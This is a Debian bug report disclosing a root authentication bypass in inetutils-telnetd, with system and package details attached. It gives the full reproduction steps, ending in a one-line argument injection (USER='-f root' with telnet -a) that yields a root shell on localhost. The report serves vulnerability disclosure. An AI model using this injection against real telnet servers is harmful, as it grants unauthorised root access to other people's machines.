Package: inetutils-telnetd Version: 2:2.7-1 Severity: grave Justification: user security hole
From https://seclists.org/oss-sec/2026/q1/89 root@kaka:~ sudo apt-get install inetutils-telnetd telnet root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf root@kaka:~ sudo /etc/init.d/inetutils-inetd start root@kaka:~ USER='-f root' telnet -a localhost ... root@kaka:~# -- System Information: Debian Release: forky/sid APT prefers testing APT policy: (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 6.17.13+deb14-amd64 (SMP w/12 CPU threads; PREEMPT) Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8), LANGUAGE=en_CA:en Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages inetutils-telnetd depends on: pn inetutils-inetd | inet-superserver <none> ii libc6 2.42-9 ii libcom-err2 1.47.2-3+b8 ii libk5crypto3 1.22.1-2 ii libkrb5-3 1.22.1-2 ii libtinfo6 6.6+20251231-1 ii login 1:4.16.0-2+really2.41.3-2 ii netbase 6.5 ii systemd-sysv 259-1 inetutils-telnetd recommends no packages. inetutils-telnetd suggests no packages.
